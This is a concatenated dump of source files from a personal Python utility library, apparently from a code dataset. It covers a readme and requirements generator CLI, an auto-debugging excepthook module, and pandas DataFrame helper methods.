"""Load a readme file, replace the old auto-generated table with the
new one (or adds it if none is present), and writes back to the same
path.
Parameters
----------
path: Path
Readme file location. Will be created if it doesn't exist.
file_df: pd.DataFrame
1 row for each file, where columns are things like file
name/size/summary.
"""
path.touch()
with open(path, 'r+') as f:
text = f.read().split(self.readme_id_start)[0] \
+ self._autogenerate_text(file_df)
f.seek(0)
f.write(text)
def _autogenerate_text(self, df):
"""Create the autogenerated text portion that will be written to a
readme. This consists of dataframe html (my notebooks/files sometimes
contain markdown so a markdown table was a bit buggy) sandwiched
between some text marking the start/end of autogeneration.
Parameters
----------
df: pd.DataFrame
DF where 1 row corresponds to 1 file.
Returns
-------
str: Autogenerated text to plug into readme.
"""
date_str = 'Last updated: ' + datetime.now().strftime(self.time_fmt)
autogen = (self.readme_id_start + date_str + '\n\n'
+ df.to_html(index=False).replace('\\n', '<br/>')
+ self.readme_id_end)
return autogen
def _parse_py(self, path):
"""Process a python script to find its summary (module-level docstring)
and line count.
Parameters
----------
path: Path
Returns
-------
dict: Information about the file specified by `path`. Additional
attributes can be added without issue.
"""
with open(path, 'r') as f:
text = f.read()
tree = ast.parse(text)
return {'Summary': ast.get_docstring(tree) or self.default,
'Line Count': len(text.splitlines())}
def _parse_ipynb(self, path):
"""Extract summary and other stats (# of code/markdown cells) from a
notebook. The summary must be a markdown cell within the first 3 cells
of the notebook where the first line is '# Summary' (this shows up as a
large header in markdown).
Parameters
----------
path: Path
Returns
-------
dict: Information about the file specified by `path`. Additional
attributes can be added without issue.
"""
with open(path, 'r') as f:
cells = json.load(f)['cells']
res = {
'Summary': self.default,
'Code Cell Count': len([c for c in cells
if c['cell_type'] == 'code']),
'Markdown Cell Count': len([c for c in cells
if c['cell_type'] == 'markdown'])
}
for cell in cells[:3]:
if cell['cell_type'] == 'markdown' and \
'summary' in cell['source'][0].lower():
# Notebook lines include newlines so we don't add them back in.
res['Summary'] = ''.join(cell['source'][1:]).strip()
return res
return res
def timestamp_to_time_str(self, time):
"""Convert a timestamp to a nicely formatted datetime string.
Parameters
----------
time: int
Returns
-------
str: Format like '2021/03/31 15:43:00'
"""
return datetime.fromtimestamp(time).strftime(self.time_fmt)
def last_modified_date(self, path):
"""Get the last time a file was modified. If in a git repo, this
information is often uninformative due to pulls, but we try to retrieve
the data by checking the last commit each file changed in. This will
fail if running the command from a different repo (which you shouldn't
really ever do) and fall back to the file system's record of last
modified time.
Parameters
----------
path: Path
Returns
-------
str: Date formatted like in `timestamp_to_time_str`.
"""
try:
# If we're in a git repo, file edit times are changed when we pull
# so we have to use built-in git functionality. This will fail if
# we call the command from a different repo. I vaguely recall
# seeing weird git behavior inside running docker containers so I'm
# not sure if this will work there.
git_time = subprocess.check_output(
self.last_edited_cmd_fmt.format(path).split()
)
timestamp = int(git_time.decode().strip()
.replace('format:', '').replace('"', ''))
except Exception as e:
timestamp = path.stat().st_ctime
return self.timestamp_to_time_str(timestamp)
@staticmethod
def readable_file_size(n_bytes):
"""Convert a file size in bytes to a human readable unit. Not
extensively tested but it seems to work so far.
Parameters
----------
n_bytes: int
Returns
-------
str: File size in a more human readable unit (e.g. mb or gb). A space
separates the numeric portion and the unit name.
"""
power = len(str(n_bytes)) - 1
assert power < 24, 'Are you sure file is larger than a yottabyte?'
prefix_powers =[
(0, 'b'),
(3, 'kb'),
(6, 'mb'),
(9, 'gb'),
(12, 'tb'),
(15, 'pb'),
(18, 'eb'),
(21, 'zb'),
(24, 'yb')
]
prev_pow = 0
prev_pre = 'b'
for curr_pow, curr_pre in prefix_powers:
if power < curr_pow: break
prev_pow = curr_pow
prev_pre = curr_pre
return f'{(n_bytes / 10**prev_pow):.2f} {prev_pre}'
def module_docstring(func):
"""Decorator to add the current module's docstring to a function's
docstring. This is intended for use in simple (1 command,
zero or minimal arguments) fire CLIs where I want to write a single
docstring for the module and function. Writing it at the module level
allows htools.cli.ReadmeUpdater to update the appropriate readme, while
this decorator ensures that the info will be available when using the
'--help' flag at the command line. Do NOT use this on functions in a
library - I've only tested it on py scripts and it relies on sys.argv, so
I'm pretty sure it will break outside of the intended context.
"""
doc = func.__doc__ or ''
module_doc = get_module_docstring(sys.argv[0])
if doc:
func.__doc__ = module_doc + '\n\n' + doc
else:
func.__doc__ = module_doc
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
def _pypi_safe_name(name):
"""Try to map from import name to install name. Going the other direction
is straightforward using pkg_resources but this is harder.
Parameters
----------
name: str
Import name of library, e.g. sklearn, requests.
Returns
-------
str: Install name of library. This is NOT foolproof: we make a few
hard-coded replacements for popular libraries (sklearn -> scikit-learn)
and replace underscores with dashes, but there's no guarantee this will
catch everything.
"""
# Common packages where install name differs from import name. It's easy to
# go from install name to import name but harder to go the reverse
# direction.
import2pypi = {
'bs4': 'beautifulsoup4',
'sklearn': 'scikit-learn',
'PIL': 'pillow',
'yaml': 'pyyaml',
}
return import2pypi.get(name, name.replace('_', '-'))
def module_dependencies(path, package='', exclude_std_lib=True):
"""Find a python script's dependencies. Assumes a relatively standard
import structure (e.g. no programmatic imports using importlib).
# TODO: at the moment, this does not support:
- relative imports
- libraries whose install name differs from its import name aside from
popular cases like scikit-learn (in other cases, this would return the
equivalent of "sklearn")
Parameters
----------
path: str or Path
Path to the python file in question.
package: str
If provided, this should be the name of the library the module belongs
to. This will help us differentiate between internal and external
dependencies. Make sure to provide this if you want internal
dependencies.
exclude_std_lib: bool
Since we often use this to help generate requirements files, we don't
always care about built-in libraries.
Returns
-------
tuple[list]: First item contains external dependencies (e.g. torch). Second
item contains internal dependencies (e.g. htools.cli depends on htools.core
in the sense that it imports it).
"""
# `skip` is for packages that are imported and aren't on pypi but don't
# show up as being part of the standard library (in the case of pkg_
# resources, I believe it's part of a library that IS part of the standard
# library but from the way it's imported that's not clear to our parser.
# These MUST be import names (not install names) if they differ.
skip = {'pkg_resources'}
with open(path, 'r') as f:
tree = ast.parse(f.read())
libs = []
internal_modules = []
for obj in tree.body:
if isinstance(obj, ast.ImportFrom):
parts = obj.module.split('.')
if parts[0] == package:
if len(parts) > 1:
internal_modules.append('.'.join(parts[1:]))
else:
assert len(obj.names) == 1, \
'Your import seems to have multiple aliases, which ' \
'we don\'t know how to process.'
assert isinstance(obj.names[0], ast.alias), \
f'Expected object name to be an alias but it ' \
f'was {obj.names[0]}.'
internal_modules.append(obj.names[0].name)
else:
libs.append(obj.module)
elif isinstance(obj, ast.Import):
names = [name.name for name in obj.names]
assert len(names) == 1, f'Error parsing import: {names}.'
libs.append(names[0])
# Make sure to filter out `skip` before applying _pypi_safe_name.
libs = set(_pypi_safe_name(lib.partition('.')[0]) for lib in libs
if lib not in skip)
if exclude_std_lib:
libs = (lib for lib in libs if not in_standard_library(lib))
return sorted(libs), sorted(internal_modules)
def _resolve_dependencies(mod2ext, mod2int):
"""Fully resolve dependencies: if module "a" depends on "b" in the same
package (an "internal" dependency), "a" implicitly depends on all of "b"'s
external dependencies.
Parameters
----------
mod2ext: dict[str, list]
Maps module name to list of names of external dependencies (e.g.
torch).
mod2int: dict[str, list]
Maps module name to list of names of internal dependencies.
Returns
-------
dict[str, list]: Maps module name to list of module names (external only,
but accounts for implicit dependencies).
"""
old = {}
new = {k: set(v) for k, v in mod2ext.items()}
# If module a depends on b and b depends on c, we may require
# multiple rounds of updates.
while True:
for k, v in mod2ext.items():
new[k].update(flatten(new[mod] for mod in mod2int[k]))
if old == new: break
old = new
return {k: sorted(v) for k, v in new.items()}
def library_dependencies(lib, skip_init=True):
"""Find libraries a library depends on. This helps us generate
requirements.txt files for user-built packages. It also makes it easy to
create different dependency groups for setup.py, allowing us to install
htools[meta] or htools[core] (for example) instead of all htools
requirements if we only want to use certain modules.
Runs in the current working directory.
# TODO: at the moment, this does not support:
- relative imports
- nested packages
- running from different directories (currently it just checks all python
files in the current directory)
- libraries whose install name differs from its import name except for
popular cases like scikit-learn (in other cases, this would return the
equivalent of "sklearn")
- imports like "from library import module as alias"
Parameters
----------
lib: str
Name of library.
skip_init: bool
If True, ignore the __init__.py file.
Returns
-------
dict: First item is a list of all dependencies. Second item is a dict
mapping module name to a list of its external dependencies. Third is a dict
mapping module name to a list of its internal dependencies. Fourth is a
dict mapping module name to a fully resolved list of external dependencies
(including implicit dependencies: e.g. if htools.core imports requests and
htools.meta imports htools.core, then htools.meta depends on requests too).
"""
mod2deps = {}
mod2int_deps = {}
for path in Path('.').iterdir():
if path.suffix != '.py' or (skip_init and path.name == '__init__.py'):
continue
try:
external, internal = module_dependencies(path, lib)
except AssertionError as e:
raise RuntimeError(f'Error processing {path.name}: {e}')
mod2deps[path.stem] = external
mod2int_deps[path.stem] = internal
fully_resolved = _resolve_dependencies(mod2deps, mod2int_deps)
all_deps = set(sum(mod2deps.values(), []))
return dict(overall=sorted(all_deps),
external=mod2deps,
internal=mod2int_deps,
resolved=fully_resolved)
def _libs2readme_str(lib2version):
return '\n'.join(f'{k}=={v}' if v else k for k, v in lib2version.items())
# TODO: figure out how to handle __init__.py when finding deps (maybe need to
# wrap each star import in try/except?). Also add extra func so the CLI command
# for find_dependencies generates text/markdown/yaml/json files we can load in
# setup.py.
def make_requirements_file(lib, skip_init=True, make_resolved=False,
out_path='../requirements.txt'):
"""Generate a requirements.txt file for a project by extracting imports
from the python source code. You must run this from the lib directory, e.g.
from something like ~/project/lib/htools.
Parameters
----------
lib: str
skip_init: bool
make_resolved: bool
out_path: str
Returns
-------
str
"""
deps = library_dependencies(lib, skip_init)
lib2version = {}
for lib in deps['overall']:
try:
lib2version[lib] = pkg.get_distribution(lib).version
except DistributionNotFound:
warnings.warn(
f'Could not find {lib} installed. You should confirm '
'if its pypi name differs from its import name.'
)
lib2version[lib] = None
# Need to sort again because different between import name and install name
# can mess up our ordering.
file_str = _libs2readme_str(lib2version)
save(file_str, out_path)
# If desired, generate a json mapping each module to its own requirements
# file. Modules with no dependencies will not have a key. The json file
# can then be loaded in setup.py to easily create a number of different
# `install_requires` variants.
if make_resolved:
out_dir = Path(out_path).parent
module2readme = {}
for mod, libs in deps['resolved'].items():
readme = _libs2readme_str({lib: lib2version[lib] for lib in libs})
if readme: module2readme[mod] = readme
save(module2readme, out_dir/'module2readme.json')
return file_str
# TODO: might be cleaner to compile all this readme functionality into a single
# class.
def update_readmes(dirs, default='_'):
"""Update readme files with a table of info about each python file or ipy
notebook in the relevant directory. This relies on python files having
module level docstrings and ipy notebooks having a markdown cell starting
with '# Summary' (this must be one of the first 3 cells in the notebook).
We also provide info on last edited times and file sizes.
Parameters
----------
dirs: str or list[str]
One or more directories to update readme files for.
default: str
Default value to use when no docstring/summary is available.
"""
parser = ReadmeUpdater(*tolist(dirs), default=default)
parser.update_dirs()
def source(name, lib='htools', copy=False):
"""Print or copy the source code of a class/function defined in htools.
Parameters
----------
name: str
Class or function defined in htools.
lib: str
Name of library containing `name`, usually 'htools'. Won't work on
the standard library or large complex libraries (specifically, those
with nested file structures).
copy: bool
If True, copy the source code the clipboard. If False, simply print it
out.
Returns
-------
str: Source code of htools class/function.
Examples
--------
# Copies source code of auto_repr decorator to clipboard. Excluding the
# -c flag will simply print out the source code.
htools src auto_repr -c
"""
src, backup_name = source_code(name, lib_name=lib)
if not src:
print(f'Failed to retrieve `{name}` source code from {lib}.')
if backup_name != name:
cmd = f'{lib} src {backup_name}'
if lib != 'htools':
cmd += f' --lib = {lib}'
print(f'We suggest trying the command:\n\n{cmd}')
if copy:
pyperclip.copy(src)
else:
print(src)
def cli():
fire.Fire({
'update_readmes': update_readmes,
'make_requirements': make_requirements_file,
'src': source
})
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,154 | hdmamin/htools | refs/heads/master | /htools/autodebug.py | """Importing this module will cause us to enter a debugging session whenever
an error is thrown. It is not included in `from htools import *` because this
is rather extreme behavior.
Examples
--------
# Enable auto debugging session on error.
from htools import debug
# Revert to default python behavior.
autodebug.disable()
"""
import sys
from IPython import get_ipython
import pdb
import traceback
from htools.meta import monkeypatch
default_excepthook = sys.excepthook
ipy = get_ipython()
@monkeypatch(sys, 'excepthook')
def excepthook(type_, val, tb):
"""Replaces sys.excepthook when module is imported, which makes us enter
a debugging session whenever an error is thrown. Disable by calling
autodebug.disable().
"""
traceback.print_exception(type_, val, tb)
pdb.post_mortem(tb)
def ipy_excepthook(self, etype, evalue, tb, tb_offset):
"""IPython doesn't use sys.excepthook. We have to handle this separately
and make sure it expects the right arguments.
"""
return excepthook(etype, evalue, tb)
def disable():
"""Revert to default behavior.
"""
sys.excepthook = default_excepthook
# Tried doing `ipy.set_custom_exc((Exception,), None)` as suggested by
# stackoverflow and chatgpt but it didn't quite restore the default
# behavior. Manually remove this instead. I'm assuming only one custom
# exception handler can be assigned for any one exception type and that
# if we call disable(), we wish to remove the handler for Exception.
ipy.custom_exceptions = tuple(x for x in ipy.custom_exceptions
if x != Exception)
# Only necessary/possible when in ipython.
try:
ipy.set_custom_exc((Exception,), ipy_excepthook)
except AttributeError:
pass
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,155 | hdmamin/htools | refs/heads/master | /htools/pd_tools.py | from functools import partial
from IPython.display import display, HTML
from numbers import Number
import numpy as np
import operator
import pandas as pd
import pandas_flavor as pf
from htools.core import spacer
from htools import set_module_global
@pf.register_series_method
@pf.register_dataframe_method
def ends(df, n=2):
"""Display the first and last few rows of a dataframe.
Parameters
-----------
n: int
Number of rows to return in the head and tail, respectively. The total
number of rows returned will be equal to 2*n.
Returns
--------
pd.DataFrame
"""
assert n > 0, 'n must be positive.'
if df.shape[0] < 2 * n:
return df
return pd.concat((df.head(n), df.tail(n)), axis=0)
@pf.register_dataframe_method
def filter_by_count(df, col, method, value, norm=False):
"""Filter a dataframe to return a subset of rows determined by their
value_counts(). For example, we can return rows with users who appear
at least 5 times in the dataframe, or with users who appear less than 10
times, or who appear exactly once.
Parameters
-----------
col: str
Name of dataframe column to filter by.
method: str
Symbol specifying which operation to use for filtering.
One of ('=', '<', '>', '<=', '>=').
value: int, float
Numeric value that each row in `col` will be compared against.
norm: bool
If True, filtering will occur on normalized values (so the value should
be a float between 0 and 1).
Returns
--------
pd.DataFrame
Examples
---------
Return rows containing users who appear at least 5 times:
df.filter_by_count('user_id', '>=', 5)
Return rows containing users who appear only once:
df.filter_by_count('user_id', '=', 1)
Return rows containing users who make up less than 20% of rows:
df.filter_by_count('user_id', '<', .2, True)
"""
operation = {'=': operator.eq,
'>': operator.gt,
'<': operator.lt,
'>=': operator.ge,
'<=': operator.le
}
counts = df[col].value_counts(norm).loc[lambda x:
operation[method](x, value)]
return df[df[col].isin(counts.index)]
@pf.register_dataframe_method
def grouped_mode(df, xs, y):
"""Return the most common value in column y for each value or combination
of values of xs. Note that this can be slow, especially when passing in
multiple x columns.
Parameters
-----------
xs: list[str]
One or more column names to group by.
y: str
Column to calculate the modes from.
Returns
--------
pd.Series
"""
return df.dropna(subset=[y])\
.groupby(xs)[y]\
.agg(lambda x: pd.Series.mode(x)[0])
@pf.register_dataframe_method
def impute(df, col, fill_val=None, method='mean', inplace=False, dummy=True):
"""Fill null values in the specified column, then optionally add an
additional column specifying whether the first column was originally null.
This can be useful in certain machine learning problems if the fact that a
value is missing may indicate something about the example.
For instance, we might try to predict student test scores, where one
feature column records the survey results of asking the student's parent to
rate their satisfaction with the teacher on a scale of 1-5. If the value is
missing, that means the parent didn't take the survey, and therefore may
not be very involved with the student's academics. This could be highly
relevant information that we don't want to discard, which we would if we
simply imputed the missing value and made no record of it.
Parameters
-----------
col: str
Name of df column to fill null values for.
fill_val: str, int, float, None
If specified, this constant value will be used to impute missing
values. If None, the `method` argument will be used to compute a fill
value.
method: str
One of ('mean', 'median', 'mode'). This will only be used when fill_val
is None. More complex methods, such as building a model to predict the
missing values based on other features, must be done manually.
inplace: bool
Specify whether to perform the operation in place (default False).
dummy: bool
Specify whether to add a dummy column recording whether the value was
initially null (default True).
Returns
--------
pd.DataFrame
"""
if not inplace:
df = df.copy()
# If adding a dummy column, it must be created before imputing null values.
if dummy:
df[col + '_isnull'] = df[col].isnull() * 1
# Mode returns a series, mean and median return primitives.
if fill_val is None:
fill_val = getattr(df[col], method)()
if method == 'mode':
fill_val = fill_val[0]
df[col].fillna(fill_val, inplace=True)
if not inplace:
return df
@pf.register_dataframe_method
def target_encode(df, x, y, n=5, stat='mean', shuffle=True, state=None,
inplace=False, df_val=None):
"""Compute target encoding based on one or more feature columns.
Parameters
-----------
x: str, list[str]
Name of columns to group by.
y: str
Name of target variable column.
n: int
Number of folds for regularized version. Must be >1.
stat: str
Specifies the type of aggregation to use on the target column.
Typically this would be mean or occasionally median, but all the
standard dataframe aggregation functions are available:
('mean', 'median', 'min', 'max', 'std', 'var', 'skew').
shuffle: bool
Specifies whether to shuffle the dataframe when creating folds of the
data. This would be important, for instance, if the dataframe is
ordered by a user_id, where each user has multiple rows. Here, a lack
of shuffling means that all of a user's rows are likely to end up in
the same fold. This effectively eliminates the value of creating the
folds in the first place.
state: None, int
If state is an integer and shuffle is True, the folds produced by
KFold will be repeatable. If state is None (the default) and shuffle
is True, shuffling will be different every time.
inplace: bool
Specifies whether to do the operation in place. The inplace version
does not return anything. When inplace==False, the dataframe is
returned.
df_val: None, pd.DataFrame
Validation set (optional). If provided, naive (i.e. un-regularized)
target encoding will be performed using the labels from the original
(i.e. training) df. NOTE: Inplace must be True when passing in df_val,
because we only return the original df.
Returns
--------
pd.DataFrame or None
"""
assert df_val is None or inplace, 'To encode df_val, inplace must be True.'
# In practice I basically never use this method and I want to remove the
# module-level sklearn import and library dependency. However, I don't want
# to remove it from the library entirely (in most cases it will be
# installed anyway, and if it's not I almost certainly won't be needing
# this method).
try:
from sklearn.model_selection import KFold
except ImportError:
raise RuntimeError('sklearn must be installed to use target_encode '
'method.')
# Prevents SettingWithCopy warning, which is not actually an issue here.
pd.options.mode.chained_assignment = None
if not inplace:
df = df.copy()
new_col = f"{'_'.join(x)}__{stat}_enc"
global_agg = getattr(df[y], stat)()
df[new_col] = global_agg
def indexer(row):
"""Map a dataframe row to its grouped target value. When we group by
multiple columns, our groupby object `enc` will require a tuple index.
Note: When benchmarking function speed, it was slightly faster when
leaving the if statement inside this function. Not sure if this is a
coincidence but it at least seems like it's not hurting performance.
"""
key = row[0] if len(x) == 1 else tuple(row)
return enc.get(key, global_agg)
# Compute target encoding on n-1 folds and map back to nth fold.
for train_idx, val_idx in KFold(n, shuffle, state).split(df):
enc = getattr(df.iloc[train_idx, :].groupby(x)[y], stat)()
mapped = df.loc[:, x].iloc[val_idx].apply(indexer, axis=1)
df.loc[:, new_col].iloc[val_idx] = mapped
df[new_col].fillna(global_agg, inplace=True)
# Encode validation set in place if it is passed in. No folds are used.
if df_val is not None:
enc = getattr(df.groupby(x)[y], stat)()
df_val[new_col] = df_val[x].apply(indexer, axis=1).fillna(global_agg)
if not inplace:
return df
@pf.register_dataframe_method
def top_categories(df, col, n_categories=None, threshold=None):
"""Filter a dataframe to return rows containing the most common categories.
This can be useful when a column has many possible values, some of which
are extremely rare, and we want to consider only the ones that occur
relatively frequently.
The user can either specify the number of categories to include or set
a threshold for the minimum number of occurrences. One of `categories` and
`threshold` should be None, while the other should be an integer.
Parameters
-----------
col: str
Name of column to filter on.
n_categories: int, None
Optional - # of categories to include (i.e. top 5 most common
categories).
threshold: int, None
Optional - Value count threshold to include (i.e. all categories that
occur at least 10 times).
Returns
--------
pd.DataFrame
"""
assert bool(n_categories) + bool(threshold) == 1
if n_categories is not None:
top = df[col].value_counts(ascending=False).head(n_categories).index
return df[df[col].isin(top)]
if threshold is not None:
return df.groupby(col).filter(lambda x: len(x) >= threshold)
@pf.register_series_method
def vcounts(df_col, **kwargs):
"""Return both the raw and normalized value_counts of a series.
Parameters
-----------
Most parameters in value_counts() are available (i.e. `sort`, `ascending`,
`dropna`), with the obvious exception of `normalize` since that is handled
automatically.
Returns
--------
pd.DataFrame
Examples
---------
df.colname.vcounts()
"""
if 'normalize' in kwargs.keys():
del kwargs['normalize']
counts = df_col.value_counts(**kwargs)
normed_counts = df_col.value_counts(normalize=True, **kwargs)
# Pandas seems to have problem merging on bool col/index. Could use
# pd.concat but unsure if order is consistent in case of ties.
if counts.name is None:
counts.name = 'raw'
normed_counts.name = 'normed'
df = pd.merge(counts, normed_counts,
how='left', left_index=True, right_index=True,
suffixes=['_raw_count', '_normed_count'])\
.reset_index()
col_name = '_'.join(df.columns[1].split('_')[:-2])
return df.rename({'index': col_name}, axis=1)
@pf.register_series_method
@pf.register_dataframe_method
def pprint(df, truncate_text=True):
"""Display a dataframe of series as a rendered HTML table in
Jupyter notebooks. Useful when printing multiple outputs in a cell.
Parameters
----------
truncate_text: bool
If True, long strings will be truncated to maintain a reasonable
row height. If False, the whole string will be displayed, which can
results in massive outputs.
"""
if isinstance(df, pd.core.series.Series):
df = pd.DataFrame(df)
if truncate_text:
display(df)
else:
display(HTML(df.to_html()))
@pf.register_series_method
@pf.register_dataframe_method
def lambda_sort(df, func, **kwargs):
"""Sort a DataFrame or Series by a function that takes itself as input.
For example, we can sort by the absolute value of a column or the sum of
2 different columns.
Parameters
-----------
func: function
Callable function or lambda expression to sort by.
(eg: lambda x: abs(x))
**kwargs: additional keyword args will be passed to the sort_values()
method.
Returns
--------
pd.DataFrame
Examples
---------
>>> df = pd.DataFrame(np.arange(8).reshape((4, 2)), columns=['a', 'b'])
>>> df.loc[3, 'a'] *= -1
>>> df
a b
0 0 1
1 2 3
2 4 6
3 -6 7
>>> df.lambda_sort(lambda x: x.a * x.b)
a b
3 -6 7
2 0 1
1 2 3
0 4 5
"""
col = 'lambda_col'
df = df.copy()
if isinstance(df, pd.core.series.Series):
df = pd.DataFrame(df)
df[col] = func(df)
return df.sort_values(col, **kwargs).drop(col, axis=1)
@pf.register_dataframe_method
def coalesce(df, cols):
"""Create a column where each row contains the first non-null value for
that row from a list of columns.
Parameters
----------
cols: list[str]
Names of columns to coalesce over.
Returns
-------
pd.Series
"""
new_col = df[cols[0]].copy()
i = 1
while new_col.isnull().sum() > 0 and i < len(cols):
next_col = cols[i]
new_col.fillna(df[next_col], inplace=True)
i += 1
return new_col
@pf.register_series_method
def stringify(list_col, join=True, ignore_terms=None, greedy_ignore=False,
null=''):
"""Converts a df column of lists, possibly containing np.nan's, to strings.
Parameters
-----------
join: bool
If True, create the string by joining all items in each list/row. If
False, simply return the first item in each list. Default True.
ignore_terms: list, set
Terms to drop from the column. If None, all terms will be retained.
Ex: {'width=device-width'}
greedy_ignore: bool
If True, ignore_terms can be a list of prefixes. In other words,
we will remove any strings in the list column that start with one of
the ignore_terms even (as opposed to requiring an exact match.)
null: str
The value to replace null values with. For many pandas string methods,
it is beneficial for this to be a string rather than np.nan.
Returns
-------
pd.Series
"""
ignore_terms = dict.fromkeys(ignore_terms or [])
def process(x, join, ignore_terms, greedy_ignore, null):
# Handles both np.nan and empty lists.
if not isinstance(x, list) or not x:
return null
# Dict instead of set to maintain order
# (dict-key operations would still change order).
x = dict.fromkeys(map(str, x))
if greedy_ignore:
x = (term for term in x if not term.startswith(tuple(ignore_terms)))
else:
x = (term for term in x if term not in ignore_terms)
# Return a string.
if join:
return ' '.join(x)
else:
return next(x)
return list_col.map(partial(process, join=join, ignore_terms=ignore_terms,
greedy_ignore=greedy_ignore, null=null))
@pf.register_series_method
def is_list_col(col):
"""Determine whether a column is a list column. These are columns
resulting from the protobuf format, where we end up with a situation
where rows either contains lists or np.nan.
Parameters
-----------
col: pd.Series
The column to evaluate.
Returns
--------
bool
"""
# Filter out nulls first otherwise type could be np.nan instead of list.
no_nulls = col.dropna()
return not no_nulls.empty and isinstance(no_nulls.iloc[0], list)
@pf.register_dataframe_method
@pf.register_series_method
def verbose_plot(df, nrows=None, **kwargs):
"""Plot data and also print it out as a table. For example, this is
nice when finding quantiles, where it's often helpful to plot them for a
quick visual snapshot but also to examine the table of values for more
details.
Parameters
----------
nrows: int or None
If provided, will truncate the printed table. Otherwise all rows will
be shown.
kwargs: any
Arguments to pass to the plot method.
Returns
-------
None
Examples
--------
df.bids.quantile(np.arange(0, 1, .1)).verbose_plot(kind='bar', color='red')
"""
df.plot(**kwargs)
df.head(nrows).pprint()
# I like doing this but it's usually not necessary since this is for
# notebook use. I wanted to remove the matplotlib import from this module
# though.
try:
plt.show()
except:
pass
@pf.register_dataframe_method
def fuzzy_groupby(df, col, model=None, cats=5, fuzzy_col=True,
globalize_vecs='_vecs', **kwargs):
"""Pandas method to group by a string column using fuzzy matching using
SentenceTransformers. Categories can be passed in or selected automatically
as the most common values in the data.
Note: this method will try to import things from the sentence_transformers
package. I chose not to include that in the htools dependencies since this
is sort of niche/experimental functionality and I don't want to require
transformers for all installs.
Parameters
----------
col: str
Column name to group by.
model: SentenceTransformer or None
By default, we use the 'all-MiniLM-L6-v2' model. This maps each piece
of text to a 384 dimensional vector. In theory, this should work with
texts of varying lengths (sentences, paragraphs, etc.) and allow us to
compare them without issue, though YMMV.
cats: Iterable[str] or int
Each item in col will be mapped to one of these categories based on the
cosine similarity between it and each category. If an integer is
provided, this defaults to the n most common items in col.
Depending on your data, there's no guarantee these will be particularly
good choices. Clustering algorithms might be a better starting
place but I still have to think about how that would work (with some
of sentence_transformers' clustering methods, not everything is
assigned to a cluster).
fuzzy_col: bool or str
If Truthy, we add a new column to df containing the cat each item was
mapped to. A string argument will be used as the new col name while a
value of True will default to f'{col}_fuzzy'.
globalize_vecs: str
If True, store resulting vectors (technically a rank 2 tensor) in a
global variable with this name. We do this rather than returning them
because a common workflow is something like:
df.fuzzy_groupby('color').age.mean()
Having fuzzy_groupby return a tuple would therefore be somewhat
awkward.
kwargs: any
Additional kwargs to pass to model.encode() when creating vectors.
Returns
-------
pd.DataFrameGroupBy
"""
from sentence_transformers.util import cos_sim
if not model:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer('all-MiniLM-L6-v2')
if isinstance(cats, Number):
cats = df[col].value_counts().head(cats).index.tolist()
vals = df[col].unique()
kwargs = {'show_progress_bar': True, **kwargs}
cat_vecs = model.encode(cats, **kwargs)
val_vecs = model.encode(vals, **kwargs)
sim_mat = cos_sim(val_vecs, cat_vecs)
w2cat = {val: cats[i] for val, i in zip(vals, sim_mat.argmax(1))}
assigned_cats = df[col].map(w2cat)
if fuzzy_col:
title = (fuzzy_col if isinstance(fuzzy_col, str) else f'{col}_fuzzy')
df[title] = assigned_cats
if globalize_vecs:
set_module_global('__main__', globalize_vecs, val_vecs)
return df.groupby(assigned_cats)
def anti_join(df_left, df_right, left_on=None, right_on=None, **kwargs):
"""Remove rows present in rhs from lhs.
Parameters
----------
df_left: pd.DataFrame
The dataframe containing the initial rows to subtract from.
df_right: pd.DataFrame
The dataframe containing rows to "subtract" from `df_left`.
left_on: str or list[str]
Column name(s) to join on.
right_on: str or list[str]
If not provided, the default is to use the same values as `left_on`.
kwargs: any
Will be passed to the merge operation. Ex: `left_index=True`.
Returns
-------
pd.DataFrame: Contains all rows that are present in `df_left` but not in
`df_right`.
"""
right = df_right.copy()
right['XX_RHS_XX'] = True
merged = df_left.merge(right, how='left', left_on=left_on,
right_on=right_on or left_on,
suffixes=['', '_rhs'], **kwargs)
return merged.loc[merged.XX_RHS_XX.isnull(), df_left.columns]
def highlight_rows(row, fn, highlight_color='yellow', default_color='white'):
"""Use with pd.style.apply to highlight certain rows. `row` will be passed
automatically through the pandas method.
Parameters
----------
row: row of a pandas DataFrame
Never passed in manually by user.
fn: function
Takes row as input and returns True if it should be highlighted, False
otherwise.
highlight_color: str
Color to display highlighted rows in.
default_color: str
Color to display un-highlighted rows in.
Examples
--------
highlight_shared = partial(highlight_rows, fn=lambda x: x.cat in names)
df.style.apply(highlight_shared, axis=1)
"""
color = highlight_color if fn(row) else default_color
return [f'background-color: {color}'] * len(row.values)
def paginate(d, seen=()):
"""Page through a dict of dataframes, showing for each column:
name, # unique, % null, standard deviation, min, max, mean, 1 non-null row
Parameters
----------
d: dict[pd.DataFrame]
seen: Iterable
If provided, this should be a list-like container of strings (or
whatever type you use as keys in `d`). These are the names of the df's
you've already explored. A common workflow is to have a line like
`seen = paginate(name2df, seen)`. This way if you choose to exit the
loop for some additional EDA, you can easily pick up where you left
off.
"""
seen = set(seen)
for i, (k, v) in enumerate(d.items(), 1):
if k in seen: continue
print(spacer())
print(f'{i}. {k}')
print(v.shape)
nulls = pd.DataFrame(v.isnull().mean().T)
# Get 1 non-null example for each column.
examples = pd.concat([v[col].dropna().head(1).reset_index(drop=True)
for col in v], axis=1).T
stats = v.select_dtypes([np.number, bool]) \
.agg([np.mean, np.std, min, max]).T
pd.DataFrame(v.nunique().sort_index()) \
.merge(nulls, left_index=True, right_index=True) \
.merge(stats, how='left', left_index=True, right_index=True) \
